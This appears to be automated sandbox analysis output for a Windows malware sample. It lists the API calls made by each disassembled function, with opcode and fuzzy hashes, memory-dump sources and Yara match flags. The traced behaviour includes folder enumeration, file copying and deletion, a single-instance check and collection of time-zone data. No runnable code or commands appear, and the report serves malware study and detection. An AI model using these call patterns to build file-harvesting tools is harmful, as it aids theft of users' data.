                    • API String ID: 3407564107-0
                    • Opcode ID: 23663e118dc1d9675e857bc575fa0cf4eec126624f33d54e6aec62cd9d365414
                    • Instruction ID: cae6dfbb8b0a00095e2cb9d19b485fa3c323730ae417f077d85d91caaf9260b4
                    • Opcode Fuzzy Hash: 23663e118dc1d9675e857bc575fa0cf4eec126624f33d54e6aec62cd9d365414
                    • Instruction Fuzzy Hash: EB111974910209EFCB04DFE4D958AEDBBB5FF04345F108469E90666250E7746B44CF99
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 040B7C17
                    • RtlAllocateHeap.NTDLL(00000000), ref: 040B7C1E
                    • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 040B7C2B
                    • wsprintfA.USER32 ref: 040B7C5A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateLocalProcessTimewsprintf
                    • String ID:
                    • API String ID: 377395780-0
                    • Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                    • Instruction ID: efd6fa82a41644d0d8a12d399307d1e0f203a3e4359654b2944dbc3b1f35d64b
                    • Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                    • Instruction Fuzzy Hash: B51139B2944118ABCB14DFC9DD45BBEB7F9FB4DB11F10421AF605A2280E3395940CBB5
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 004179B0
                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E00,00000000,?), ref: 004179B7
                    • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 004179C4
                    • wsprintfA.USER32 ref: 004179F3
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocLocalProcessTimewsprintf
                    • String ID:
                    • API String ID: 1243822799-0
                    • Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                    • Instruction ID: 87643aaeb61937c0b28f46190d625ee9f9fa63f6271d25fb840393839df263de
                    • Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                    • Instruction Fuzzy Hash: 6D1139B2944118ABCB14DFC9DD45BBEB7F9FB4DB11F10421AF605A2280E3395940CBB5
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 040B7CCA
                    • RtlAllocateHeap.NTDLL(00000000), ref: 040B7CD1
                    • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 040B7CE4
                    • wsprintfA.USER32 ref: 040B7D1E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                    • String ID:
                    • API String ID: 3317088062-0
                    • Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                    • Instruction ID: d725e83bd7477e29e6fe4cf39c3d2d3301730e7238b95cd51f017cb8132a7aa5
                    • Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                    • Instruction Fuzzy Hash: B411A1B1A45218EFEB20CF54DC49FA9B7B8FB45761F10039AF50AA32C0D77429408F95
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: strtok_s
                    • String ID:
                    • API String ID: 3330995566-0
                    • Opcode ID: 88ee3256d646c21cc813880afdb35c02c7abfa0159f377c054558803c8e079b0
                    • Instruction ID: b13d6505b9113501f18a68a0468945dc4cfd4a70f73e25e7f5570e5a14d59f63
                    • Opcode Fuzzy Hash: 88ee3256d646c21cc813880afdb35c02c7abfa0159f377c054558803c8e079b0
                    • Instruction Fuzzy Hash: 1D11E3B4E40209AFDB14CFA6D948AEEB7B5AB04705F20C029E865B6250D774A501CF99
                    APIs
                    • CreateFileA.KERNEL32(040B3D55,80000000,00000003,00000000,00000003,00000080,00000000,?,040B3D55,?), ref: 040B9563
                    • GetFileSizeEx.KERNEL32(000000FF,040B3D55), ref: 040B9580
                    • CloseHandle.KERNEL32(000000FF), ref: 040B958E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CloseCreateHandleSize
                    • String ID:
                    • API String ID: 1378416451-0
                    • Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                    • Instruction ID: c35739d4fd9a1a220ea190c405fa1c0b575aa3c7284c4ff1d845dd26a8a8b32f
                    • Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                    • Instruction Fuzzy Hash: 4DF04479F80204BBDB10DFF0DC49BDE7BBAEB49710F11C654FA51A7180D635A6018B45
                    APIs
                    • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 040B6D31
                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 040B6D4F
                    • CloseHandle.KERNEL32(00000000), ref: 040B6D60
                    • Sleep.KERNEL32(00001770), ref: 040B6D6B
                    • CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 040B6D81
                    • ExitProcess.KERNEL32 ref: 040B6D89
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                    • String ID:
                    • API String ID: 941982115-0
                    • Opcode ID: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
                    • Instruction ID: 7c74dc0bdb11df7926eec5be570de047b56d63da5538329065b78eb9a9c11912
                    • Opcode Fuzzy Hash: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
                    • Instruction Fuzzy Hash: C3F05E78B40205BEFB10ABE0DC08BFD76B5EB05749F101A18F582B5190DBB16540CADF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: `o@
                    • API String ID: 0-590292170
                    • Opcode ID: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
                    • Instruction ID: c65cc5113f4fbf7636557f8b1f026e9f2285814709fd8c8344c4410f81c0aea8
                    • Opcode Fuzzy Hash: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
                    • Instruction Fuzzy Hash: A66138B4900219EFCB14DF94E944BEEB7B1BB04304F1185AAE40A77380D739AEA4DF95
                    APIs
                      • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                    • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414BEA
                    • lstrcatA.KERNEL32(?,024EC290), ref: 00414C08
                      • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                      • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                      • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                      • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                      • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                      • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                      • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
                      • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
                      • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
                      • Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
                      • Part of subcall function 00414910: lstrcatA.KERNEL32(?,024E90F0,?,000003E8), ref: 00414A4A
                      • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
                      • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
                      • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
                      • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96
                      • Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
                      • Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31
                      • Part of subcall function 00414910: wsprintfA.USER32 ref: 00414A07
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                    • String ID: UaA
                    • API String ID: 2104210347-3893042857
                    • Opcode ID: 7aa901901dc909a98e828e7de91596a84bf0f77b9a11efe6e26eea0aae08d754
                    • Instruction ID: 5a37e5a53a2562059c730f6b0b3ae842953eee94398a2728108a858f2c1bafc2
                    • Opcode Fuzzy Hash: 7aa901901dc909a98e828e7de91596a84bf0f77b9a11efe6e26eea0aae08d754
                    • Instruction Fuzzy Hash: 9341C5BA6001047BD754FBB0EC42EEE337DA785700F40851DB54A96186EE795BC88BA6
                    APIs
                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                    • GetSystemTime.KERNEL32(?,024B9798,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: SystemTimelstrcpy
                    • String ID: cI@$cI@
                    • API String ID: 62757014-1697673767
                    • Opcode ID: 728e3afec194442a0a20c9b4cf47b2a0a0f7365ad80767aaeb7a96b2b5f46ac6
                    • Instruction ID: 15f3dfc6f8d56a301bf8b2a7a9260479b6db203ca669f730be279af5ebf73ee3
                    • Opcode Fuzzy Hash: 728e3afec194442a0a20c9b4cf47b2a0a0f7365ad80767aaeb7a96b2b5f46ac6
                    • Instruction Fuzzy Hash: 7111E971D00008AFCB04EFA9C8919EE77B9EF58314F04C05EF01667241DF38AA86CBA6
                    APIs
                      • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                    • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 0041508A
                    • lstrcatA.KERNEL32(?,024EBD50), ref: 004150A8
                      • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                      • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$FileFindFirstFolderPathwsprintf
                    • String ID: aA
                    • API String ID: 2699682494-2567749500
                    • Opcode ID: 51266d4d9ddb75a6f059c37d3d6b80fd1acaef9bed24dae35b8ecbb315133994
                    • Instruction ID: 27646669aa04729862e240b26620d37997e147c17b59a732ce93ef494e7ce50b
                    • Opcode Fuzzy Hash: 51266d4d9ddb75a6f059c37d3d6b80fd1acaef9bed24dae35b8ecbb315133994
                    • Instruction Fuzzy Hash: B801D6BAA4020877C714FBB0DC42EEE333CAB55304F00415DB68A570D1EE789AC88BA6
                    APIs
                      • Part of subcall function 040BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 040BA9EF
                      • Part of subcall function 040BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 040BAC2C
                      • Part of subcall function 040BAC17: lstrcpy.KERNEL32(00000000), ref: 040BAC6B
                      • Part of subcall function 040BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 040BAC79
                      • Part of subcall function 040BAB87: lstrcpy.KERNEL32(00000000,?), ref: 040BABD9
                      • Part of subcall function 040BAB87: lstrcat.KERNEL32(00000000), ref: 040BABE9
                      • Part of subcall function 040BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 040BAB6C
                      • Part of subcall function 040BAA07: lstrcpy.KERNEL32(?,00000000), ref: 040BAA4D
                      • Part of subcall function 040AA077: memcmp.MSVCRT(?,00421264,00000003), ref: 040AA094
                    • lstrlen.KERNEL32(00000000), ref: 040ABF06
                      • Part of subcall function 040B9097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 040B90B9
                    • StrStrA.SHLWAPI(00000000,004213E0), ref: 040ABF34
                    • lstrlen.KERNEL32(00000000), ref: 040AC00C
                    • lstrlen.KERNEL32(00000000), ref: 040AC020
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                    • String ID:
                    • API String ID: 1440504306-0
                    • Opcode ID: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
                    • Instruction ID: 357f8c8d2a0022ce8b450c7d378dfd989f2e43a6b79c4b6c83a45e9786b42d48
                    • Opcode Fuzzy Hash: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
                    • Instruction Fuzzy Hash: 9AB17F71A10208ABEF18FBA4DD91EEE7379AF5420CF544159E546B2090EF387B48CFA5
                    APIs
                    • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
                    • StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
                    • StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
                    • FindClose.KERNEL32(000000FF), ref: 00413C7C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1879542620.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.1879542620.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1879542620.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$CloseFileNextlstrcat
                    • String ID: !=A
                    • API String ID: 3840410801-2919091325
                    • Opcode ID: 28feb7c8be81de4ab4b55bfcc7f9479259f5a9bafbd7cecf7f5c2433705f41d5
                    • Instruction ID: 20ec2b31cb4d991c835852fde49fc2354676703d0d5a57c203257a76fc367b8d
                    • Opcode Fuzzy Hash: 28feb7c8be81de4ab4b55bfcc7f9479259f5a9bafbd7cecf7f5c2433705f41d5
                    • Instruction Fuzzy Hash: FCD012756401096BCB20EF90DD589EA7779DB55305F0041C9B40EA6150EB399B818B95
                    APIs
                      • Part of subcall function 040B9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 040B9072
                    • lstrcat.KERNEL32(?,00000000), ref: 040B51E1
                    • lstrcat.KERNEL32(?,00421070), ref: 040B51FE
                    • lstrcat.KERNEL32(?,0064A5F8), ref: 040B5212
                    • lstrcat.KERNEL32(?,00421074), ref: 040B5224
                      • Part of subcall function 040B4B77: wsprintfA.USER32 ref: 040B4B93
                      • Part of subcall function 040B4B77: FindFirstFileA.KERNEL32(?,?), ref: 040B4BAA
                      • Part of subcall function 040B4B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 040B4BD8
                      • Part of subcall function 040B4B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 040B4BEE
                      • Part of subcall function 040B4B77: FindNextFileA.KERNEL32(000000FF,?), ref: 040B4DE4
                      • Part of subcall function 040B4B77: FindClose.KERNEL32(000000FF), ref: 040B4DF9
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                    • String ID:
                    • API String ID: 2667927680-0
                    • Opcode ID: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
                    • Instruction ID: 8cb6cc071227cc375e800201d24145c681b98eb5fb9208af7a72624dbf430283
                    • Opcode Fuzzy Hash: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
                    • Instruction Fuzzy Hash: 7521C87AA40208BBD714FBF0DC45EED337DAB55304F404188B6C5A6190DE74AAC9CBE6
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1881130721.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 040A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_40a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpynlstrlenwsprintf
                    • String ID:
                    • API String ID: 1206339513-0
                    • Opcode ID: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                    • Instruction ID: 06066706b2fcea93d4fc10a591e51c4c6a031ca4d0c5ee7aac7cc6ab23db3f53
                    • Opcode Fuzzy Hash: bda2825dd20141c14e66db048f7389e73ec0fb40efc247105e9df97f2adce381
                    • Instruction Fuzzy Hash: 8901DE79540108FFCB04DFECD994EAE7BBAEF45394F108148F9499B301C635AA40DB95